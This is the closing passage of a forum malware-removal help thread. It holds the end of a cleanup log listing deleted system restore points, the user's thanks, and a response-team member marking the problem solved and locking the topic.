Deleted : RP #2632 [Removed Sophos Virus Removal Tool. | 10/25/2014 00:18:24]
Deleted : RP #2633 [Removed SpyHunter | 10/25/2014 00:34:16]
Deleted : RP #2635 [avast! antivirus system restore point | 10/25/2014 00:42:19]
Deleted : RP #2636 [Removed Java 7 Update 71 | 10/27/2014 00:16:38]

New restore point created !

########## - EOF - ##########
 

Thank you very much for your assistance with this issue.  I greatly appreciate your assistance, and please let me know if anything further is required.  I've made note of your recommendations for updating my installed applications and will start using FileHippo. 

 

Sincerely,

 

John



#15 Gunto

    Bleepin' Reject Phoenix

  • Malware Response Team
  • 1,291 posts
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA

Posted 01 November 2014 - 04:04 PM

Hi,

 

Wonderful, and you're very welcome. I'm happy that I could help. :) Great news, we're done here!

 

Since your problems seem to be solved, I'm locking this topic. However, if you still need help, please send me (or any moderator if I am unavailable) a PM asking for this topic to be unlocked.

 

Gunto






